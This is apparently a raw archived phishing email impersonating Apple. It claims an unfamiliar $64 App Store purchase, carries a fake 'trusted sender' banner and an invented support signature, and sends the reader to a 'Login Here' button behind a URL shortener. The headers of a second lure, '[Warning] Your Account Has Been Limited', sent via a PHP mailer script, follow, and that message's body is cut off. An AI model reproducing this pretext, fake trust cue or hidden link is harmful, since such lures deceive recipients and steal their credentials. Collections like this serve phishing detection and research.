From: Apple<Appstr@inbox.eu>
Message-Id: <E1fjbea-00GPla-0A@enterprise.inverseparadox.net>
Date: Sat, 28 Jul 2018 22:41:52 -0400
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - enterprise.inverseparadox.net
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [1049 994] / [47 12]
X-AntiAbuse: Sender Address Domain - enterprise.inverseparadox.net
X-Get-Message-Sender-Via: enterprise.inverseparadox.net: authenticated_id: kovitch/only user confirmed/virtual account not confirmed
X-Authenticated-Sender: enterprise.inverseparadox.net: kovitch
X-Source: 
X-Source-Args: 
X-Source-Dir: kovitchandson.com:/public_html/wp-content/upgrade
Status: O
X-Status: 
X-Keywords:                  
X-UID: 542

<center>
<div dir="ltr" style="text-align: left;">
<table style="background-color: #eeeeee; border-collapse: collapse; color: #444444; font-family: Calibri, sans-serif; font-size: 15px; line-height: 1.6em; width: 1000px;">
<tbody style="line-height: 21.3px;">
<tr style="line-height: 21.3px; height: 21px;">
<th style="background-color: #029740; border: 0px solid #000000; color: white; line-height: 21.3px; padding: 4px; width: 4px; height: 21px;">&nbsp;</th>
<td style="background-color: #f3fff8; border: 0px solid #000000; line-height: 21.3px; padding: 4px; height: 21px;">
<div style="line-height: 21.3px;"><span style="font-size: 12px; line-height: 17.04px;">This message is from a trusted sender.</span></div>
</td>
</tr>
</tbody>
</table>
<br />
<div>
<div class="yiv3489039588adM">&nbsp;</div>
</div>
</div>
</center><!--<![endif]-->
<p>&nbsp;</p>
<div class="nl-container" style="min-width: 320px; margin: 0 auto; background-color: #ffffff;">
<div style="background-color: transparent;">
<div class="block-grid two-up" style="margin: 0 auto; min-width: 320px; max-width: 620px; width: calc(31000% - 197780px); overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;">
<div style="border-collapse: collapse; display: table; width: 100%;">
<div class="col num6" style="float: left; max-width: 320px; min-width: 310px; width: calc(6510px - 1000%); background-color: transparent;"><img class="left fullwidth" style="outline: none; clear: both; border: 0px; height: 42px; width: 42px; max-width: 190px; float: left;" title="Image" src="https://www.apple.com/ac/structured-data/images/knowledge_graph_logo.png" alt="Image" width="190" align="left" border="0" /><br /><br /></div>
<div class="col num6" style="float: left; max-width: 320px; min-width: 310px; width: calc(6510px - 1000%); background-color: transparent;">
<div style="background-color: transparent; width: 100% !important;"><!-- [if (!mso)&(!IE)]><!-->
<div style="border: 0px solid transparent; padding: 5px 10px 5px 10px;"><!--<![endif]-->
<div style="color: #555555; line-height: 120%; font-family: TimesNewRoman, 'Times New Roman', Times, Baskerville, Georgia, serif; padding: 15px 0px 15px 0px;">&nbsp;</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div style="background-color: transparent;">
<div class="block-grid " style="margin: 0 auto; min-width: 320px; max-width: 620px; width: calc(31000% - 197780px); overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;">
<div style="border-collapse: collapse; display: table; width: 100%;">
<div class="col num12" style="min-width: 320px; max-width: 620px; width: calc(30000% - 185380px); background-color: transparent;">
<div style="background-color: transparent; width: 100% !important;">
<div style="border: 0px solid transparent; padding: 5px 0px 5px 0px;">
<div style="padding: 20px 10px 20px 10px;">
<div align="center">
<div style="border-top: 1px dotted #CCCCCC; width: 100%; line-height: 1px; height: 1px; font-size: 1px;">&nbsp;</div>
</div>
</div>
<!-- [if (!mso)&(!IE)]><!--></div>
<!--<![endif]--></div>
</div>
</div>
</div>
</div>
<div style="background-color: transparent;">
<div class="block-grid " style="margin: 0 auto; min-width: 320px; max-width: 620px; width: calc(31000% - 197780px); overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;">
<div style="border-collapse: collapse; display: table; width: 100%;">
<div class="col num12" style="min-width: 320px; max-width: 620px; width: calc(30000% - 185380px); background-color: transparent;">
<div style="background-color: transparent; width: 100% !important;"><!-- [if (!mso)&(!IE)]><!-->
<div style="border: 0px solid transparent; padding: 5px 0px 5px 0px;"><!--<![endif]-->
<div style="color: #71777d; line-height: 150%; font-family: 'Lato', Tahoma, Verdana, Segoe, sans-serif; padding: 10px 10px 30px 10px;">
<div style="font-size: 12px; line-height: 18px; font-family: Lato, Tahoma, Verdana, Segoe, sans-serif; color: #71777d; text-align: left;">
<p style="margin: 0px; font-size: 12px; line-height: 18px; text-align: left;"><span style="font-size: 12px; line-height: 18px;">Your Apple ID Account was used to sign in to Safari on an iPhone 6 and make an make purchase of $64 on App Store.</span></p>
<p style="margin: 0; font-size: 12px; line-height: 18px;"><span style="font-size: 12px; line-height: 18px;">&nbsp;</span></p>
<p style="margin: 0; font-size: 12px; line-height: 18px;"><br /><span style="font-size: 12px; line-height: 18px;">Date and Time : Today</span></p>
<p style="margin: 0; font-size: 12px; line-height: 18px;"><span style="background-color: transparent;">IP &nbsp;: 192.146.36.94</span></p>
<p style="margin: 0; font-size: 12px; line-height: 18px;"><span style="font-size: 12px; line-height: 18px;">Operating System : iPhone 6</span></p>
<p style="margin: 0; font-size: 12px; line-height: 18px;"><span style="font-size: 12px; line-height: 18px;">&nbsp;</span></p>
<p style="margin: 0; font-size: 12px; line-height: 18px;"><br /><span style="font-size: 12px; line-height: 18px;">If the information above looks familiar, you can disregard this email.&nbsp;</span><br /><span style="font-size: 12px; line-height: 18px;">If you have not recently signed in to an iPhone 6 your account and believe someone may have accessed your account, go to your account and update your information as soon as possible.</span></p>
</div>
</div>
<!-- [if mso]></td></tr></table><![endif]-->
<div class="button-container center" style="padding: 10px;" align="center"><a style="display: inline-block; text-decoration: none; -webkit-text-size-adjust: none; text-align: center; color: #ffffff; background-color: #b9c2c6; border-radius: 4px; -webkit-border-radius: 4px; -moz-border-radius: 4px; max-width: 110px; width: auto; font-family: 'Lato', Tahoma, Verdana, Segoe, sans-serif; mso-border-alt: none; border: 0px solid transparent; padding: 0px 15px 0px 15px;" href="http://gg.gg/b64f3" target="_blank" rel="noopener"> <span style="font-size: 16px; line-height: 32px;">Login Here</span> </a></div>
<!-- [if (!mso)&(!IE)]><!--></div>
<!--<![endif]--></div>
</div>
<!-- [if (mso)|(IE)]></td></tr></table></td></tr></table><![endif]--></div>
</div>
</div>
<div style="background-color: transparent;">
<div class="block-grid two-up" style="margin: 0 auto; min-width: 320px; max-width: 620px; width: calc(31000% - 197780px); overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;">
<div style="border-collapse: collapse; display: table; width: 100%;">
<div class="col num6" style="float: left; max-width: 320px; min-width: 310px; width: calc(6510px - 1000%); background-color: transparent;">
<div style="background-color: transparent; width: 100% !important;"><!-- [if (!mso)&(!IE)]><!-->
<div style="border: 0px solid transparent; padding: 5px 0px 5px 0px;"><!--<![endif]-->
<div style="padding: 10px;">
<div align="center">
<div style="border-top: 0px solid transparent; width: 100%; line-height: 0px; height: 0px; font-size: 0px;">&nbsp;</div>
</div>
</div>
<!-- [if (!mso)&(!IE)]><!--></div>
<!--<![endif]--></div>
</div>
<div class="col num6" style="float: left; max-width: 320px; min-width: 310px; width: calc(6510px - 1000%); background-color: transparent;">
<div style="background-color: transparent; width: 100% !important;"><!-- [if (!mso)&(!IE)]><!-->
<div style="border: 0px solid transparent; padding: 5px 10px 5px 10px;"><!--<![endif]-->
<div style="color: #555555; line-height: 120%; font-family: 'Lato', Tahoma, Verdana, Segoe, sans-serif; padding: 15px 0px 0px 0px;">
<div style="font-size: 12px; line-height: 14px; color: #555555; font-family: 'Lato', Tahoma, Verdana, Segoe, sans-serif; text-align: left;">
<p style="margin: 0; font-size: 14px; line-height: 17px; text-align: right;"><span style="color: #000000; font-size: 14px; line-height: 16px;"><strong>Caroline&nbsp;Hurne</strong></span></p>
</div>
</div>
<div style="color: #555555; line-height: 120%; font-family: 'Lato', Tahoma, Verdana, Segoe, sans-serif; padding: 0px 0px 5px 0px;">
<div style="font-size: 12px; line-height: 14px; color: #555555; font-family: 'Lato', Tahoma, Verdana, Segoe, sans-serif; text-align: left;">
<p style="margin: 0; font-size: 12px; line-height: 14px; text-align: right;">Support - AppleID.</p>
</div>
</div>
<!-- [if (!mso)&(!IE)]><!--></div>
<!--<![endif]--></div>
</div>
<!-- [if (mso)|(IE)]></td></tr></table></td></tr></table><![endif]--></div>
</div>
</div>
<div style="background-color: transparent;">
<div class="block-grid " style="margin: 0 auto; min-width: 320px; max-width: 620px; width: calc(31000% - 197780px); overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;">
<div style="border-collapse: collapse; display: table; width: 100%;">
<div class="col num12" style="min-width: 320px; max-width: 620px; width: calc(30000% - 185380px); background-color: transparent;">
<div style="background-color: transparent; width: 100% !important;"><!-- [if (!mso)&(!IE)]><!-->
<div style="border: 0px solid transparent; padding: 5px 0px 5px 0px;"><!--<![endif]-->
<div style="padding: 20px 10px 20px 10px;">
<div align="center">
<div style="border-top: 1px dotted #CCCCCC; width: 100%; line-height: 1px; height: 1px; font-size: 1px;">&nbsp;</div>
</div>
<!-- [if (mso)]></td></tr></table></td></tr></table><![endif]--></div>
<!-- [if (!mso)&(!IE)]><!--></div>
<!--<![endif]--></div>
</div>
</div>
</div>
</div>
<div style="background-color: transparent;">
<div class="block-grid " style="margin: 0 auto; min-width: 320px; max-width: 620px; width: calc(31000% - 197780px); overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;">
<div style="border-collapse: collapse; display: table; width: 100%;">
<div class="col num12" style="min-width: 320px; max-width: 620px; width: calc(30000% - 185380px); background-color: transparent;">
<div style="background-color: transparent; width: 100% !important;"><!-- [if (!mso)&(!IE)]><!-->
<div style="border: 0px solid transparent; padding: 5px 0px 5px 0px;"><!--<![endif]-->
<div style="color: #555555; line-height: 120%; font-family: 'Lato', Tahoma, Verdana, Segoe, sans-serif; padding: 10px;">
<div style="font-size: 12px; line-height: 14px; font-family: Lato, Tahoma, Verdana, Segoe, sans-serif; color: #555555; text-align: left;">
<p style="margin: 0; font-size: 14px; line-height: 17px;"><span style="font-size: 12px; line-height: 14px;">Copyright &copy; 2018 AppleID, Inc. All rights reserved. </span><br /><span style="font-size: 12px; line-height: 14px;">You subscribed to our newsletter via our website.</span></p>
<p style="margin: 0; font-size: 14px; line-height: 17px;">&nbsp;</p>
<p style="margin: 0; font-size: 14px; line-height: 17px;">&nbsp;</p>
</div>
</div>
</div>
<!--<![endif]--></div>
</div>
</div>
</div>
</div>
</div>


From jose@monkey.org Mon Jul 30 23:10:01 2018 +0000
Return-Path: support@membercare.com
Delivered-To: jose@monkey.org
X-FDA: 74443634202.30.meal40_1d4d410db8f45
X-Spam-Summary: 10,1,0,4b7d9e959003aa69,d41d8cd98f00b204,support@membercare.com,:,RULES_HIT:2:41:72:355:375:379:541:882:967:969:973:978:983:988:989:1026:1189:1208:1224:1260:1311:1313:1314:1345:1381:1431:1433:1434:1437:1515:1516:1517:1535:1567:1571:1588:1589:1606:1699:1710:1714:1730:1747:1777:1792:1801:2084:2194:2198:2199:2200:2393:2525:2527:2538:2539:2561:2564:2682:2685:2693:2859:2890:2900:2909:2933:2937:2939:2942:2945:2947:2951:2954:2975:3000:3022:3138:3139:3140:3141:3142:3148:3421:3865:3867:3868:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4321:4361:4605:5007:6261:6650:6657:6669:6674:6678:6688:7903:8603:8957:9025:9108:9149:9908:10231:10346:11657:11658:11914:12043:12050:12051:12295:12438:12555:12903:12955:12958:12967:12986:13018:13019:13139:13377:13894:14096:14129:14829:14985:21063:21080:21094:21323:21433:21450:21451:21524:21627:30001:30016:30022:30054:30055:30067:30070,0,RBL:185.26.125.216:@membercare.com:.lbl8.mailshell.net-62.14.144.100 64.201.201.201,CacheIP:
X-HE-Tag: meal40_1d4d410db8f45
X-Filterd-Recvd-Size: 5971
Received: from mx2.cmail.ch (cdsweb.cds-web.ch [185.26.125.216])
	by imf29.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon, 30 Jul 2018 23:10:01 +0000 (UTC)
Received: by mx2.cmail.ch (Postfix, from userid 48)
	id 77B2611EB3; Tue, 31 Jul 2018 01:09:59 +0200 (CEST)
To: jose@monkey.org
Subject: [Warning] Your Account Has Been Limited
X-PHP-Originating-Script: 48:leafmailer.php
Date: Mon, 30 Jul 2018 23:09:59 +0000
